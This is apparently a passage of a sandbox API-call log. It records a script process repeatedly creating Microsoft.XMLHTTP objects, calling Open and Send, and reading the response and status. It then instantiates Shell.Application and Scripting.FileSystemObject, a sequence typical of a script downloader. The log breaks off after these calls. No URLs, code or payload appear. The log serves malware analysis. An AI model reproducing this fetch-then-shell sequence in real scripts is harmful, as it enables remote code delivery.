	[0239.065] ??2@YAPEAX_K@Z () returned 0x62f330
	[0239.065] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0239.065] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0239.065] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0239.065] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0239.065] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0239.065] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.066] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0239.066] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.066] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0239.066] SysStringLen (param_1=0x0) returned 0x0
	[0239.066] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0239.066] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0239.066] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0239.066] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0239.066] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0239.066] ??2@YAPEAX_K@Z () returned 0x62f310
	[0239.066] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0239.066] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0239.066] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0239.066] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0239.066] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0239.066] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.066] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0239.067] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.067] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0239.067] SysStringLen (param_1=0x0) returned 0x0
	[0239.067] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0239.067] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0239.067] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0239.067] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0239.067] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0239.067] ??2@YAPEAX_K@Z () returned 0x62f330
	[0239.067] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f330) 
	[0239.067] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0239.067] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0239.067] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0239.067] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0239.067] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.067] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0239.067] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.068] longjmp () 
	[0239.068] longjmp () 
	[0239.068] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0239.068] SysStringLen (param_1=0x0) returned 0x0
	[0239.068] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0239.068] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0239.068] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0239.068] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0239.068] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0239.068] ??2@YAPEAX_K@Z () returned 0x62f310
	[0239.068] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f310) 
	[0239.068] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0239.068] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0239.068] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0239.068] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0239.068] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.068] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0239.069] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.069] longjmp () 
	[0239.069] longjmp () 
	[0239.069] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0239.069] SysStringLen (param_1=0x0) returned 0x0
	[0239.069] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0239.069] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0239.069] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0239.069] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0239.069] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0239.069] ??2@YAPEAX_K@Z () returned 0x62f330
	[0239.069] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f330) 
	[0239.069] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0239.069] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0239.069] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0239.069] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0239.069] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.070] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0239.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.070] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0239.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0239.241] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0239.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0239.241] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0239.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0239.242] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0239.242] SysStringLen (param_1=0x0) returned 0x0
	[0239.242] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0239.242] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0239.242] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0239.242] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0239.242] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0239.242] ??2@YAPEAX_K@Z () returned 0x62f350
	[0239.242] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0239.242] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0239.242] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0239.242] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0239.242] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0239.242] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0239.242] SysStringLen (param_1=0x0) returned 0x0
	[0239.242] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0239.244] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
